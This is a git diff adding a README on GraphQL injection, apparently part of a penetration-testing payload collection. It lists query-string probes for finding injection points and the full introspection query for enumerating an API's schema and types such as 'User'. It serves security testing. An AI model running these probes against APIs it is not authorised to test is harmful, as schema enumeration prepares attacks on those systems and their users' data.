diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
new file mode 100644
index 0000000..c997161
--- /dev/null
+++ b/GraphQL Injection/README.md
@@ -0,0 +1,130 @@
+# GraphQL injection
+
+GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
+
+## Exploit
+
+Identify an injection point
+
+```
+?param={__schema{types{name}}}
+```
+Check if errors are visible
+
+```
+?param={__schema}
+?param={}
+?param={thisdefinitelydoesnotexist}
+```
+
+Enumerate Database Schema with the following GraphQL query
+
+```
+fragment FullType on __Type {
+ kind
+ name
+ description
+ fields(includeDeprecated: true) {
+ name
+ description
+ args {
+ ...InputValue
+ }
+ type {
+ ...TypeRef
+ }
+ isDeprecated
+ deprecationReason
+ }
+ inputFields {
+ ...InputValue
+ }
+ interfaces {
+ ...TypeRef
+ }
+ enumValues(includeDeprecated: true) {
+ name
+ description
+ isDeprecated
+ deprecationReason
+ }
+ possibleTypes {
+ ...TypeRef
+ }
+}
+fragment InputValue on __InputValue {
+ name
+ description
+ type {
+ ...TypeRef
+ }
+ defaultValue
+}
+fragment TypeRef on __Type {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ ofType {
+ kind
+ name
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+}
+
+query IntrospectionQuery {
+ __schema {
+ queryType {
+ name
+ }
+ mutationType {
+ name
+ }
+ types {
+ ...FullType
+ }
+ directives {
+ name
+ description
+ locations
+ args {
+ ...InputValue
+ }
+ }
+ }
+}
+
+```
+
+Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
+
+```
+{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
+```
+
+## References
+
+* [Introduction to GraphQL](https://graphql.org/learn/)
+* [GraphQL Introspection](https://graphql.org/learn/introspection/)
+